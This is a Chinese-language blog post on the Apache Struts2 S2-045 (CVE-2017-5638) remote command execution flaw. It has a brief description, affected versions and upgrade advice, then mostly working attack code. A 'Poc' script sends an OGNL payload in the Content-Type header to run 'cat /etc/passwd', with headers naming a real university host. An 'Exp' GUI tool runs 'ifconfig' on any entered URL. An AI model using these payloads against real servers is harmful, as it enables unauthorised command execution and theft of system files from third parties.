Struts2 基于Jakarta的远程命令执行漏洞(附Poc&Exp)

Posted 知安

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Struts2 基于Jakarta的远程命令执行漏洞(附Poc&Exp)相关的知识,希望对你有一定的参考价值。


文章前半部分来自团队小伙伴阿德马的总结,后半部分的Poc和Exp是小编匆忙之际借鉴而来,感谢写Poc和Exp的伙伴~


安恒给官方上报的,然后官方选择了1个对国内来说比较敏感的时期发了公告出来,好蛋疼。


该漏洞的CVE编号是CVE-2017-5638(s2-045),攻击者利用该漏洞可以进行远程命令执行,从而获取更高的服务器权限。


漏洞描述:


查了点资料,发现跟struts2配置中struts.multipart.handler的设置有关,默认使用的就是Jakarta对应类org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest。也就是说struts2的此项设置使用了默认配置就会存在该漏洞。


攻击者通过修改http请求头中的Content-Type的值来触发该漏洞,进而执行命令获取更高的系统权限。


如图所示:



上图是使用了测试用poc对被攻击服务器执行了”whoami”的命令。


漏洞影响范围:


Struts 2.3.5 – Struts 2.3.3

Struts 2.5 – Struts 2.5.10


修复建议:


升级到Struts 2.3.32 或者 Struts 2.5.10.1(稳妥方法)


或者在struts2配置中修改struts.multipart.handler的配置(个人理解,未测试)


再贴个预警邮件,大家就都不用写了:


Struts2 基于Jakarta的远程命令执行漏洞(附Poc&Exp)

HI,ALL:

Apache Struts2又爆出了新的远程命令执行漏洞,对应CVE编号是CVE-2017-5638,请对受影响的struts2 版本进行升级处理。


Poc&Exp


Poc:

#! /usr/bin/env python

# encoding:utf-8

import urllib2

import sys

from poster.encode import multipart_encode

from poster.streaminghttp import register_openers


header1 ={

"Host":"alumnus.shu.edu.cn",

"Connection":"keep-alive",

"Refer":"alumnus.shu.edu.cn",

"Accept":"*/*",

"X-Requested-With":"XMLHttpRequest",

"Accept-Encoding":"deflate",

"Accept-Language":"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",

}


def poc():

    register_openers()

    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})

    header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

    header["Content-Type"]='''%{(#nike='multipart/form-data').

    (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).

    (#_memberAccess?(#_memberAccess=#dm):

    ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

    (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

    (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

    (#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').

    (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).

    (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).

    (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).

    (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().

    getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).

    (#ros.flush())}'''

    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)

    response = urllib2.urlopen(request)

    print response.read()


poc()


Exp:

#coding:utf-8

import urllib2

from Tkinter import *

import sys

from poster.encode import multipart_encode

from poster.streaminghttp import register_openers




class START():


    def __init__(self,root):

        self.root=root

        self.show_W_Text = Text()

        self.show_url_ed = Label(root, text="str2")

        self.butt_whois = Button(root, text="kill",command=self.poc)

        self.show_url_ed.pack()

        self.edit_url.pack()

        self.butt_whois.pack()

        self.show_W_Text.pack()


    def poc(self):

        w_url = self.edit_url.get()

        text = self.show_W_Text

        register_openers()

        datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})

        header[

            "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

        header[

            "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

        request = urllib2.Request(w_url, datagen, headers=header)

        response = urllib2.urlopen(request).read()

        text.insert(1.0, response)


if __name__ == '__main__':


    root=Tk()

    root.title("str2 045")

    motion=START(root)

    mainloop()



知安,您产品的安全医院!

http://www.knowsafe.com/


以上是关于Struts2 基于Jakarta的远程命令执行漏洞(附Poc&Exp)的主要内容,如果未能解决你的问题,请参考以下文章

struts2远程命令执行漏洞S2-045

Struts-S2-045漏洞利用

出大事了Struts 2爆S2-046紧急漏洞!再不下手就晚了!

安全通告|Struts2(S2-052)远程命令执行漏洞

Struts2最新2013漏洞S-016远程命令执行

飞视美 视频会议系统 Struts2 远程命令执行漏洞